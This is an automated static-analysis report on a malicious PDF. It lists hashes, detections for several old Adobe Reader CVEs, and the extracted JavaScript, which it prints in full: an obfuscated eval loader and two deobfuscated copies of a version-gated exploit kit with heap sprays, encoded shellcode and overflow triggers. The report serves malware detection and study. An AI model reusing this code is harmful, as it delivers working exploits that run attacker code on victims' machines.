Malicious PDF — malware analysis report

Static analysis result for SHA-256 39c6df738df20375…

MALICIOUS

PDF

32.7 KB Created: 2010-07-25 10:32:51 First seen: 2012-10-18
MD5: 64cc75229d56963a529dd294ea4fb5d7 SHA-1: 60cf49173c8788416056fe9f05b4b5b73763dad0 SHA-256: 39c6df738df20375af4a056a5a5b196edf82d44cdd855fa338067ab795e26c38
448 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0x7EDF 827 bytes
SHA-256: c6b2b2ed562c81fde7d898eba16f2fb5fe75d80616e0028808b3294396ecef2e
Preview script
First 1,000 lines of the extracted script
dc = (function(){return this;}).call(null);
ezgw = new Date();
var ngpb='';
var da = 'e'+(parseInt(ezgw.getFullYear())-1)+'a'+ngpb+'l';
hges=dc[da.replace('2009','v')];
function mni(){
	var wnwq='',yf=[];
	var ngpb='';
	hges('va'+ngpb+'r chz=th'+ngpb+'i'+ngpb+'s');
	hges('va'+ngpb+'r ly=Str'+ngpb+'ing.f'+ngpb+'romC'+ngpb+'harCode');
	var ik='prod' + ezgw.getFullYear()+'er';
	var hrzy = chz[ik.replace('2010','uc')];
	var ii = '' + ezgw.getFullYear() + ngpb + 'i'+ngpb+'t';
	var tiyf = 's' + ii.replace('2010','pl');
	var psnp='2010';
	psnp = psnp.replace(ezgw.getFullYear(),'');
	hges('va'+psnp+'r n' + ngpb + 'r=[' + hrzy + psnp + ']');
	var rn = nr;
	qfpp='le'+ngpb+'ng'+ngpb+'th';
	var jz = rn[qfpp] / 2;
	for (var pw = 0; pw < jz; pw++) {
		wnwq += ly(rn[pw+jz] - rn[pw]);
	}
	return wnwq;
	}
	var gv=mni();
	hges(gv);
generic_stage_recovery_000.js deobfuscated-js generic stage recovery producer-halfdiff from raw PDF metadata at offset 0x0 3603 bytes
SHA-256: 54d1631fc4a2e4ecffad2d6ad48802685fa9fe670202539d02ed4b865c3ac9af
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var jmn='%u9090%u9090%u16eb%u37b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%u5534%ue2aa%uc3fa%ue5e8%uffff%ubcff%u5459%u5555%ud40b%u09b9%u5554%udc55%ud8b2%u451a%u3ad8%u6401%u028e%u0604%u0606%u0606%u0606%u0600%u3d06%u5451%u5555%u0300%u3d06%u3b3a%u5555%u203d%u3927%u0138%udb3d%u5b1b%ubdb9%u551d%u5555%ubd05%u5529%u5555%u85aa%u91d6%u3d5d%uba1a%u501a%ubd05%u5539%u5555%u85aa%u95d0%u4220%u013f%ua60c%u3dff%uab27%u43e6%u48bd%u5555%u0555%u04bd%u5555%uaa55%u0685%uab3f%udc3d%u543a%ubde8%u555d%u5555%ubd05%u5569%u5555%u85aa%u6435%u3195%u05de%ude65%u5907%u07de%ude41%u7d27%u4dec%u5555%u6455%u64aa%uf995%u3469%u5729%u7579%u9a94%u5458%ub792%ud4a5%u0eaa%u1fe9%ude3f%u4517%u47de%u8c20%u11dc%u4971%u9634%ude35%u7139%ude71%u6910%u01de%u2d50%ubf54%u1fde%ude4d%u750f%ube54%u61b6%ude1c%ude61%ubb54%uaa64%u9564%uf9a9%u95d1%u5221%u9a94%u5458%ube92%u6ea1%u7129%u207d%udeb4%u710f%ube54%ude33%u1e59%u0fde%u5449%udebe%ude51%ubd54%u11dc%u4971%u9734%u555d%ubabd%uaaab%u3daa%u2121%u6f25%u7a7a%u2232%u6666%u367b%u7b2f%u3636%u317a%u257b%u253d%u336a%u6768%u7367%u6830%u5566';function xyw(bf,jh){while(bf.length*2<jh){bf+=bf;}
bf=bf.substring(0,jh/2);return bf;}
function jxm(){var frb=new Array();var ived=0x0c0c0c0c;var addr=0x400000;var payload=unescape(jmn);var sc_len=payload.length*2;var jh=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=xyw(yarsp,jh);var count2=(ived-0x400000)/addr;for(var count=0;count<count2;count++){frb[count]=yarsp+payload;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(jmn);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;}
fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}
mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);}
function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(jmn);var hWq500CN=payload.length*2;var jh=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=xyw(yarsp,jh);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;}
var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;}
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}}
if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){jxm();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}
var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}}
if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(jmn);while(d.length<=0x8000){d+=d;}
d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}
a();a();try{this.media.newPlayer(null);}catch(e){}
a();}}
generic_stage_recovery_001.js deobfuscated-js generic stage recovery percent-decode from raw PDF metadata at offset 0x0 3599 bytes
SHA-256: 43b7341632bea2ebeb701df63083587d8f765dd6dbe12cd984d57ed27c624a92
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var jmn='%u9090%u9090%u16eb%u37b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%u5534%ue2aa%uc3fa%ue5e8%uffff%ubcff%u5459%u5555%ud40b%u09b9%u5554%udc55%ud8b2%u451a%u3ad8%u6401%u028e%u0604%u0606%u0606%u0606%u0600%u3d06%u5451%u5555%u0300%u3d06%u3b3a%u5555%u203d%u3927%u0138%udb3d%u5b1b%ubdb9%u551d%u5555%ubd05%u5529%u5555%u85aa%u91d6%u3d5d%uba1a%u501a%ubd05%u5539%u5555%u85aa%u95d0%u4220%u013f%ua60c%u3dff%uab27%u43e6%u48bd%u5555%u0555%u04bd%u5555%uaa55%u0685%uab3f%udc3d%u543a%ubde8%u555d%u5555%ubd05%u5569%u5555%u85aa%u6435%u3195%u05de%ude65%u5907%u07de%ude41%u7d27%u4dec%u5555%u6455%u64aa%uf995%u3469%u5729%u7579%u9a94%u5458%ub792%ud4a5%u0eaa%u1fe9%ude3f%u4517%u47de%u8c20%u11dc%u4971%u9634%ude35%u7139%ude71%u6910%u01de%u2d50%ubf54%u1fde%ude4d%u750f%ube54%u61b6%ude1c%ude61%ubb54%uaa64%u9564%uf9a9%u95d1%u5221%u9a94%u5458%ube92%u6ea1%u7129%u207d%udeb4%u710f%ube54%ude33%u1e59%u0fde%u5449%udebe%ude51%ubd54%u11dc%u4971%u9734%u555d%ubabd%uaaab%u3daa%u2121%u6f25%u7a7a%u2232%u6666%u367b%u7b2f%u3636%u317a%u257b%u253d%u336a%u6768%u7367%u6830%u5566';function xyw(bf,jh){while(bf.length*2<jh){bf+=bf;}
bf=bf.substring(0,jh/2);return bf;}
function jxm(){var frb=new Array();var ived=0x0c0c0c0c;var addr=0x400000;var payload=unescape(jmn);var sc_len=payload.length*2;var jh=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=xyw(yarsp,jh);var count2=(ived-0x400000)/addr;for(var count=0;count<count2;count++){frb[count]=yarsp+payload;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(jmn);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;}
fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}
mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("E000f",num);}
function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(jmn);var hWq500CN=payload.length*2;var jh=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=xyw(yarsp,jh);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;}
var tUMhNbGw=unescape("	");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;}
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}}
if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){jxm();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}
var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}}
if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(jmn);while(d.length<=0x8000){d+=d;}
d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}
a();a();try{this.media.newPlayer(null);}catch(e){}
a();}}

Open this report in the interactive analyzer, or submit your own file for analysis.